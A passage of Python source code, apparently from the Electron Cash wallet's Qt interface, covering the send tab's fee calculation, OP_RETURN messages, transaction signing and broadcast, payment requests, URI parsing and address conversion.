+ "\n\n" + _('It is calculated from the Custom Fee Rate in preferences, but can be overridden from the manual fee edit on this form (if enabled).')
+ "\n\n" + _('Generally, a fee of 1.0 sats/B is a good minimal rate to ensure your transaction will make it into the next block.'))
self.fee_custom_lbl.setFixedWidth(140)
self.fee_slider_mogrifier()
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
grid.addWidget(self.fee_e_label, 6, 0)
grid.addWidget(self.fee_slider, 6, 1)
grid.addWidget(self.fee_custom_lbl, 6, 1)
grid.addWidget(self.fee_e, 6, 2)
self.preview_button = EnterButton(_("&Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("&Send"), self.do_send)
self.clear_button = EnterButton(_("&Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 7, 1, 1, 3)
self.payto_e.textChanged.connect(self.update_buttons_on_seed) # hide/unhide various buttons
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textChanged.connect(self.update_fee)
self.message_opreturn_e.editingFinished.connect(self.update_fee)
self.opreturn_rawhex_cb.stateChanged.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enabled = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enabled)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
extra = run_hook("not_enough_funds_extra", self)
if isinstance(extra, str) and extra:
text += " ({})".format(extra)
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
opret_color = ColorScheme.DEFAULT
if self.op_return_toolong:
opret_color = ColorScheme.RED
text = _("OP_RETURN message too large, needs to be no longer than 220 bytes") + (", " if text else "") + text
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.message_opreturn_e.setStyleSheet(opret_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textEdited.connect(entry_changed)
self.message_opreturn_e.editingFinished.connect(entry_changed)
self.opreturn_rawhex_cb.stateChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
self.invoice_list.chkVisible()
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
fee_rate = None
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
outputs.append(OPReturn.output_for_rawhex(opreturn_message))
else:
outputs.append(OPReturn.output_for_stringdata(opreturn_message))
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
self.op_return_toolong = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except OPReturn.TooLarge:
self.op_return_toolong = True
return
except OPReturn.Error as e:
self.statusBar().showMessage(str(e))
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.max_button.isChecked():
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is not None:
fee_rate = fee / tx.estimated_size()
self.fee_slider_mogrifier(self.get_custom_fee_text(fee_rate))
def fee_slider_mogrifier(self, text = None):
fee_slider_hidden = self.config.has_custom_fee_rate()
self.fee_slider.setHidden(fee_slider_hidden)
self.fee_custom_lbl.setHidden(not fee_slider_hidden)
if text is not None: self.fee_custom_lbl.setText(text)
def from_list_delete(self, name):
item = self.from_list.currentItem()
if (item and item.data(0, Qt.UserRole) == name
and not item.data(0, Qt.UserRole+1) ):
i = self.from_list.indexOfTopLevelItem(item)
try:
self.pay_from.pop(i)
except IndexError:
# The list may contain items not in the pay_from if added by a
# plugin using the spendable_coin_filter hook
pass
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
if not item:
return
menu = QMenu()
name = item.data(0, Qt.UserRole)
action = menu.addAction(_("Remove"), lambda: self.from_list_delete(name))
if item.data(0, Qt.UserRole+1):
action.setText(_("Not Removable"))
action.setDisabled(True)
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self, *, spendable=None):
''' Optional kwarg spendable indicates *which* of the UTXOs in the
self.pay_from list are actually spendable. If this arg is specifid,
coins in the self.pay_from list that aren't also in the 'spendable' list
will be grayed out in the UI, to indicate that they will not be used.
Otherwise all coins will be non-gray (default).
(Added for CashShuffle 02/23/2019) '''
sel = self.from_list.currentItem() and self.from_list.currentItem().data(0, Qt.UserRole)
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def name(x):
return "{}:{}".format(x['prevout_hash'], x['prevout_n'])
def format(x):
h = x['prevout_hash']
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
x['prevout_n'], x['address'])
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
def new(item, is_unremovable=False):
ret = QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])
ret.setData(0, Qt.UserRole, name(item))
ret.setData(0, Qt.UserRole+1, is_unremovable)
return ret
for item in self.pay_from:
twi = new(item)
if spendable is not None and item not in spendable:
grayify(twi)
self.from_list.addTopLevelItem(twi)
if name(item) == sel:
self.from_list.setCurrentItem(twi)
if spendable is not None: # spendable may be None if no plugin filtered coins.
for item in spendable:
# append items added by the plugin to the spendable list
# at the bottom. These coins are marked as "not removable"
# in the UI (the plugin basically insisted these coins must
# be spent with the other coins in the list for privacy).
if item not in self.pay_from:
twi = new(item, True)
self.from_list.addTopLevelItem(twi)
if name(item) == sel:
self.from_list.setCurrentItem(twi)
def get_contact_payto(self, contact : Contact) -> str:
assert isinstance(contact, Contact)
_type, label = contact.type, contact.name
emoji_str = ''
mod_type = _type
mine_str = ''
if _type.startswith('cashacct'): # picks up cashacct and the cashacct_W pseudo-contacts
if _type == 'cashacct_T':
# temporary "pending verification" registration pseudo-contact. Never offer it as a completion!
return None
mod_type = 'cashacct'
info = self.wallet.cashacct.get_verified(label)
if info:
emoji_str = f' {info.emoji}'
if _type == 'cashacct_W':
mine_str = ' [' + _('Mine') + '] '
else:
self.print_error(label, "not found")
# could not get verified contact, don't offer it as a completion
return None
elif _type == 'openalias':
return contact.address
return label + emoji_str + ' ' + mine_str + '<' + contact.address + '>' if mod_type in ('address', 'cashacct') else None
def update_completions(self):
l = []
for contact in self.contact_list.get_full_contacts(include_pseudo=True):
s = self.get_contact_payto(contact)
if s is not None: l.append(s)
l.sort(key=lambda x: x.lower()) # case-insensitive sort
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
on_pw_cancel = kwargs.pop('on_pw_cancel', None)
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
if callable(on_pw_cancel):
on_pw_cancel()
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
isInvoice= False;
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
isInvoice = True;
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if self.payto_e.is_alias and not self.payto_e.validated:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
try:
# handle op_return if specified and enabled
opreturn_message = self.message_opreturn_e.text()
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
outputs.append(OPReturn.output_for_rawhex(opreturn_message))
else:
outputs.append(OPReturn.output_for_stringdata(opreturn_message))
except OPReturn.TooLarge as e:
self.show_error(str(e))
return
except OPReturn.Error as e:
self.show_error(str(e))
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins(isInvoice)
return outputs, fee, label, coins
def _chk_no_segwit_suspects(self):
''' Makes sure the payto_e has no addresses that might be BTC segwit
in it and if it does, warn user. Intended to be called from do_send.
Returns True if no segwit suspects were detected in the payto_e,
False otherwise. If False is returned, a suitable error dialog
will have already been presented to the user. '''
if bool(self.config.get('allow_legacy_p2sh', False)):
return True
segwits = set()
prefix_char = '3' if not networks.net.TESTNET else '2'
for line in self.payto_e.lines():
line = line.strip()
if ':' in line and line.lower().startswith(networks.net.CASHADDR_PREFIX + ":"):
line = line.split(':', 1)[1] # strip bitcoincash: prefix
if ',' in line:
line = line.split(',', 1)[0] # if address, amount line, strip address out and ignore rest
line = line.strip()
if line.startswith(prefix_char) and Address.is_valid(line):
segwits.add(line)
if segwits:
msg = ngettext("Possible BTC Segwit address in 'Pay to' field. "
"Please use CashAddr format for p2sh addresses.\n\n{segwit_addresses}",
"Possible BTC Segwit addresses in 'Pay to' field. "
"Please use CashAddr format for p2sh addresses.\n\n{segwit_addresses}",
len(segwits)).format(segwit_addresses='\n'.join(segwits))
detail = _("Legacy '{prefix_char}...' p2sh address support in the Send tab is "
"restricted by default in order to prevent inadvertently "
"sending BCH to Segwit BTC addresses.\n\n"
"If you are an expert user, go to 'Preferences -> Transactions' "
"to enable the use of legacy p2sh addresses in the Send tab.").format(prefix_char=prefix_char)
self.show_error(msg, detail_text=detail)
return False
return True
def _warn_if_legacy_address(self):
"""Show a warning if self.payto_e has legacy addresses, since the user
might be trying to send BTC instead of BCH."""
warn_legacy_address = bool(self.config.get("warn_legacy_address", True))
if not warn_legacy_address:
return
for line in self.payto_e.lines():
line = line.strip()
if line.lower().startswith(networks.net.CASHADDR_PREFIX + ":"):
line = line.split(":", 1)[1] # strip "bitcoincash:" prefix
if "," in line:
# if address, amount line, strip address out and ignore rest
line = line.split(",", 1)[0]
line = line.strip()
if Address.is_legacy(line):
msg1 = (
_("You are about to send BCH to a legacy address.")
+ "<br><br>"
+ _("Legacy addresses are deprecated for Bitcoin Cash "
"(BCH), but they are used by Bitcoin (BTC).")
)
msg2 = _("Proceed if what you intend to do is to send BCH.")
msg3 = _("If you intend to send BTC, close the application "
"and use a BTC wallet instead. Electron Cash is a "
"BCH wallet, not a BTC wallet.")
res = self.msg_box(
parent=self,
icon=QMessageBox.Warning,
title=_("You are sending to a legacy address"),
rich_text=True,
text=msg1,
informative_text=msg2,
detail_text=msg3,
checkbox_text=_("Never show this again"),
checkbox_ischecked=False,
)
if res[1]: # Never ask if checked
self.config.set_key("warn_legacy_address", False)
break
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
# paranoia -- force a resolve right away in case user pasted an
# openalias or cashacct and hit preview too quickly.
self.payto_e.resolve(force_if_has_focus=True)
if not self._chk_no_segwit_suspects():
return
self._warn_if_legacy_address()
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
#self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
#return
if preview:
# NB: this ultimately takes a deepcopy of the tx in question
# (TxDialog always takes a deep copy).
self.show_transaction(tx, tx_desc)
return
# We must "freeze" the tx and take a deep copy of it here. This is
# because it's possible that it points to coins in self.pay_from and
# other shared data. We want the tx to be immutable from this point
# forward with its own private data. This fixes a bug where sometimes
# the tx would stop being "is_complete" randomly after broadcast!
tx = copy.deepcopy(tx)
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
# IN THE FUTURE IF WE WANT TO APPEND SOMETHING IN THE MSG ABOUT THE FEE, CODE IS COMMENTED OUT:
#if fee > confirm_rate * tx.estimated_size() / 1000:
# msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if (fee < (tx.estimated_size())):
msg.append(_('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm."))
tx.ephemeral['warned_low_fee_already'] = True
if self.config.get('enable_opreturn') and self.message_opreturn_e.text():
msg.append(_("You are using an OP_RETURN message. This gets permanently written to the blockchain."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx, tx_desc)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs, use_cache=True)
else:
task = partial(self.wallet.sign_transaction, tx, password, use_cache=True)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc, *, callback=None):
def broadcast_thread():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
if pr:
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
if not ack_status:
if ack_msg == "no url":
# "no url" hard-coded in send_payment method
# it means merchant doesn't need the tx sent to him
# since he didn't specify a POST url.
# so we just broadcast and rely on that result status.
ack_msg = None
else:
return False, ack_msg
# at this point either ack_status is True or there is "no url"
# and we proceed anyway with the broadcast
status, msg = self.network.broadcast_transaction(tx)
# figure out what to return...
msg = ack_msg or msg # prefer the merchant's ack_msg over the broadcast msg, but fallback to broadcast msg if no ack_msg.
status = bool(ack_status or status) # if both broadcast and merchant ACK failed -- it's a failure. if either succeeded -- it's a success
if status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
else:
# Not a PR, just broadcast.
status, msg = self.network.broadcast_transaction(tx)
return status, msg
# Check fee and warn if it's below 1.0 sats/B (and not warned already)
fee = None
try: fee = tx.get_fee()
except: pass # no fee info available for tx
# Check fee >= size otherwise warn. FIXME: If someday network relay
# rules change to be other than 1.0 sats/B minimum, this code needs
# to be changed.
if (isinstance(fee, int) and tx.is_complete() and fee < len(str(tx))//2
and not tx.ephemeral.get('warned_low_fee_already')):
msg = _('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm.") + "\n\n" + _("Proceed?")
if not self.question(msg, title = _("Low Fee")):
return
# /end fee check
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
if self.gui_object.warn_if_no_network(self):
# Don't allow a useless broadcast when in offline mode. Previous to this we were getting an exception on broadcast.
return
elif not self.network.is_connected():
# Don't allow a potentially very slow broadcast when obviously not connected.
parent.show_error(_("Not connected"))
return
def broadcast_done(result):
# GUI thread
cb_result = False
if result:
status, msg = result
if status:
cb_result = True
buttons, copy_index, copy_link = [ _('Ok') ], None, ''
try: txid = tx.txid() # returns None if not is_complete, but may raise potentially as well
except: txid = None
if txid is not None:
if tx_desc is not None:
self.wallet.set_label(txid, tx_desc)
copy_link = web.BE_URL(self.config, 'tx', txid)
if copy_link:
# tx is complete and there is a copy_link
buttons.insert(0, _("Copy link"))
copy_index = 0
if parent.show_message(_('Payment sent.') + '\n' + msg,
buttons = buttons,
defaultButton = buttons[-1],
escapeButton = buttons[-1]) == copy_index:
# There WAS a 'Copy link' and they clicked it
self.copy_to_clipboard(copy_link, _("Block explorer link copied to clipboard"), self.top_level_window())
self.invoice_list.update()
self.do_clear()
else:
if msg.startswith("error: "):
msg = msg.split(" ", 1)[-1] # take the last part, sans the "error: " prefix
parent.show_error(msg)
if callback:
callback(cb_result)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices, *, add_cancel_button=False):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
buts = [OkButton(dialog)]
if add_cancel_button:
buts.insert(0, CancelButton(dialog))
vbox.addLayout(Buttons(*buts))
result = dialog.exec_()
dialog.setParent(None)
if not result:
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
request_error = (self.payment_request and self.payment_request.error) or ''
self.payment_request = None
self.print_error("PaymentRequest error:", request_error)
self.show_error(_("There was an error processing the payment request"), rich_text=False, detail_text=request_error)
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr, strict=True, on_exc=self.on_error)
except web.ExtraParametersInURIWarning as e:
out = e.args[0] # out dict is in e.args[0]
extra_params = e.args[1:]
self.show_warning(ngettext('Extra parameter in URI was ignored:\n\n{extra_params}',
'Extra parameters in URI were ignored:\n\n{extra_params}',
len(extra_params)
).format(extra_params=', '.join(extra_params)))
# fall through ...
except web.BadURIParameter as e:
extra_info = (len(e.args) > 1 and str(e.args[1])) or ''
self.print_error('Bad URI Parameter:', *[repr(i) for i in e.args])
if extra_info:
extra_info = '\n\n' + extra_info # prepend newlines
self.show_error(_('Bad parameter: {bad_param_name}{extra_info}').format(bad_param_name=e.args[0], extra_info=extra_info))
return
except web.DuplicateKeyInURIError as e:
# this exception always has a translated message as args[0]
# plus a list of keys as args[1:], see web.parse_URI
self.show_error(e.args[0] + ":\n\n" + ', '.join(e.args[1:]))
return
except Exception as e:
self.show_error(_('Invalid bitcoincash URI:') + '\n\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
op_return = out.get('op_return')
op_return_raw = out.get('op_return_raw')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address or URI.strip().lower().split(':', 1)[0] in web.parseable_schemes():
# if address, set the payto field to the address.
# if *not* address, then we set the payto field to the empty string
# only IFF it was bitcoincash: and/or cashacct:, see issue #1131.
self.payto_e.setText(address or '')
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
if op_return:
self.message_opreturn_e.setText(op_return)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(False)
self.opreturn_label.setHidden(False)
elif op_return_raw is not None:
# 'is not None' allows blank value.
# op_return_raw is secondary precedence to op_return
if not op_return_raw:
op_return_raw='empty'
self.message_opreturn_e.setText(op_return_raw)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(True)
self.opreturn_label.setHidden(False)
elif not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText('')
self.message_opreturn_e.setHidden(True)
self.opreturn_rawhex_cb.setHidden(True)
self.opreturn_label.setHidden(True)
if address and URI.lower().startswith(cashacct.URI_SCHEME + ':'):
# this is important so that cashacct: URIs get insta-resolved
# (they only get resolved when payto_e loses focus)
self.message_e.setFocus()
def do_clear(self):
''' Clears the send tab, reseting its UI state to its initiatial state.'''
self.max_button.setChecked(False)
self.not_enough_funds = False
self.op_return_toolong = False
self.payment_request = None
self.payto_e.is_pr = False
self.payto_e.is_alias, self.payto_e.validated = False, False # clear flags to avoid bad things
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.message_opreturn_e]:
e.setText('')
e.setFrozen(False)
self.payto_e.setHidden(False)
self.payto_label.setHidden(False)
self.max_button.setDisabled(False)
self.opreturn_rawhex_cb.setChecked(False)
self.opreturn_rawhex_cb.setDisabled(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.message_opreturn_e.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_rawhex_cb.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_label.setVisible(self.config.get('enable_opreturn', False))
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_converter_tab(self):
source_address = QLineEdit()
cash_address = ButtonsLineEdit()
cash_address.addCopyButton()
cash_address.setReadOnly(True)
legacy_address = ButtonsLineEdit()
legacy_address.addCopyButton()
legacy_address.setReadOnly(True)
widgets = [
(cash_address, Address.FMT_CASHADDR),
(legacy_address, Address.FMT_LEGACY),
]
def convert_address():
try:
addr = Address.from_string(source_address.text().strip())
except:
addr = None
for widget, fmt in widgets:
if addr:
widget.setText(addr.to_full_string(fmt))
else:
widget.setText('')
source_address.textChanged.connect(convert_address)
w = QWidget()
grid = QGridLayout()
grid.setSpacing(15)
grid.setColumnStretch(1, 2)
grid.setColumnStretch(2, 1)
label = QLabel(_('&Address to convert'))
label.setBuddy(source_address)
grid.addWidget(label, 0, 0)
grid.addWidget(source_address, 0, 1)
label = QLabel(_('&Cash address'))
label.setBuddy(cash_address)
grid.addWidget(label, 1, 0)
grid.addWidget(cash_address, 1, 1)
label = QLabel(_('&Legacy address'))
label.setBuddy(legacy_address)
grid.addWidget(label, 2, 0)
grid.addWidget(legacy_address, 2, 1)
w.setLayout(grid)
label = WWLabel(_(
"This tool helps convert between address formats for Bitcoin "
"Cash addresses.\nYou are encouraged to use the 'Cash address' "
"format."
))
vbox = QVBoxLayout()
vbox.addWidget(label)
vbox.addWidget(w)
vbox.addStretch(1)
w = QWidget()
w.setLayout(vbox)
return w
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_ui_string()))):
self.wallet.delete_address(addr)
self.update_tabs()
self.update_status()
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
coins = []
if self.pay_from:
coins = copy.deepcopy(self.pay_from)
else:
coins = self.wallet.get_spendable_coins(None, self.config, isInvoice)
run_hook("spendable_coin_filter", self, coins) # may modify coins -- used by CashShuffle if in shuffle = ENABLED mode.
if self.pay_from:
# coins may have been filtered, so indicate this in the UI
self.redraw_from_list(spendable=coins)
return coins
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
run_hook('on_spend_coins', self, coins) # CashShuffle: will set the mode of send tab to coins[0]'s shuffled/unshuffled state
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.do_clear()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, contacts : List[Contact]):
paytos = []
for contact in contacts:
s = self.get_contact_payto(contact)
if s is not None: paytos.append(s)
self.payto_payees(paytos)
def payto_payees(self, payees : List[str]):
''' Like payto_contacts except it accepts a list of free-form strings
rather than requiring a list of Contacts objects '''
self.show_send_tab()
if len(payees) == 1:
self.payto_e.setText(payees[0])
self.amount_e.setFocus()
else:
text = "\n".join([payee + ", 0" for payee in payees])
self.payto_e.setText(text)
self.payto_e.setFocus()
def resolve_cashacct(self, name):
''' Throws up a WaitingDialog while it resolves a Cash Account.
Goes out to network, verifies all tx's.
Returns: a tuple of: (Info, Minimally_Encoded_Formatted_AccountName)
Argument `name` should be a Cash Account name string of the form:
name#number.123
name#number
name#number.; etc
If the result would be ambigious, that is considered an error, so enough
of the account name#number.collision_hash needs to be specified to
unambiguously resolve the Cash Account.
On failure throws up an error window and returns None.'''
return cashacctqt.resolve_cashacct(self, name)
def set_contact(self, label, address, typ='address', replace=None) -> Contact:
''' Returns a reference to the newly inserted Contact object.
replace is optional and if specified, replace an existing contact,
otherwise add a new one.
